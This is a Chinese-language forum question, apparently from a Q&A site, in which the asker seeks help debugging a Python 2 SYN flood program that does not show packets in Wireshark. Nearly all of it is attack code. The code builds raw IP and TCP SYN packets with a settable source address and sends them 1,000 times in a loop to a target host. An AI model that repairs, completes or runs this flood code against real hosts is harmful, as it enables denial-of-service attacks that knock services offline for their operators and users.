我正在尝试使用python进行syn flood程序。我从http://www.binarytides.com/python-syn-flood-program-raw-sockets-linux/获得了以下代码。
运行时,wireshark中没有数据包。但是当我删除IP_HDRINCL行时,我可以看到IPV4(协议值=“ff”)数据包,但我想要tcp(这就是为什么我选择包含精心设计的ip头来设置协议= 6)
import ctypes
import socket, sys
from struct import *
def checksum(msg):
s = 0
# loop taking 2 characters at a time
for i in range(0, len(msg), 2):
w = ord(msg[i]) + (ord(msg[i+1]) << 8 )
s = s + w
s = (s>>16) + (s & 0xffff);
s = s + (s >> 16);
#complement and mask to 4 byte short
s = ~s & 0xffff
return s
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) #RAW PACKET
except socket.error , msg:
print 'Socket could not be created. Error Code : ' + str(msg[0]) + 'Message ' + msg[1]
sys.exit()
source_ip = '172.26.102.111'
dest_ip = '172.22.2.48'
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) #INCLUDE HEADER
#Constructing the packet
packet = '';
#*******************IP HEADER********************
ip_ihl = 5
ip_ver = 4
ip_tos = 0
ip_tot_len = 48
ip_id = 54321
ip_frag_off = 0
ip_ttl = 128
ip_proto = 6
ip_check = 14840 #ca5f from http://www.n-cg.net/hec.htm
ip_saddr = socket.inet_aton ( source_ip )
ip_daddr = socket.inet_aton ( dest_ip )
ip_ihl_ver = (ip_ver << 4) + ip_ihl
# the ! in the pack format string means network order
ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, 6 , ip_check, ip_saddr, ip_daddr)
#ip_check=checksum(ip_header)
ip_header = pack('!BBHHHBBH4s4s' , ip_ihl_ver, ip_tos, ip_tot_len, ip_id, ip_frag_off, ip_ttl, 6 , ip_check, ip_saddr, ip_daddr)
#**********************IP HEADER IS COMPLETEDE********************
# ********************* TCP HEADER********************
tcp_source = 1234
tcp_dest = 8000
tcp_seq = 524
tcp_ack_seq = 0
tcp_doff = 5 #tcp header 5 * 4 = 20 bytes
#tcp flags
tcp_fin = 0
tcp_syn = 1
tcp_rst = 0
tcp_psh = 0
tcp_ack = 0
tcp_urg = 0
tcp_window = socket.htons (8192) # maximum allowed window size
tcp_check = 0
tcp_urg_ptr = 0
tcp_offset_res = (tcp_doff << 4) + 0
tcp_flags = tcp_fin + (tcp_syn << 1) + (tcp_rst << 2) + (tcp_psh <<3) + (tcp_ack << 4) + (tcp_urg << 5)
tcp_header = pack('!HHLLBBHHH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window, tcp_check, tcp_urg_ptr)
data = 'GET /abc'
# pseudo header fields
source_address = socket.inet_aton( source_ip )
dest_address = socket.inet_aton(dest_ip)
placeholder = 0
protocol =6
tcp_length = len(tcp_header) + len(data)
psh = pack('!4s4sBBH' , source_address , dest_address , placeholder , 6 , tcp_length);
psh = psh + tcp_header + data;
tcp_check = checksum(psh)
print tcp_check,"before inducing checksum"
#print tcp_checksum
# make the tcp header again and fill the correct checksum - remember checksum is NOT in network byte order
tcp_header = pack('!HHLLBBH' , tcp_source, tcp_dest, tcp_seq, tcp_ack_seq, tcp_offset_res, tcp_flags, tcp_window) + pack('H' , tcp_check) + pack('!H' , tcp_urg_ptr)
tcp_header=tcp_header
# final full packet - syn packets dont have any data
packet = ip_header+tcp_header
#Send the packet finally - the port specified has no effect
k=0
#s.connect((dest_ip,80))
while k<1000:
s.sendto(packet,(dest_ip,80))
k=k+1
print k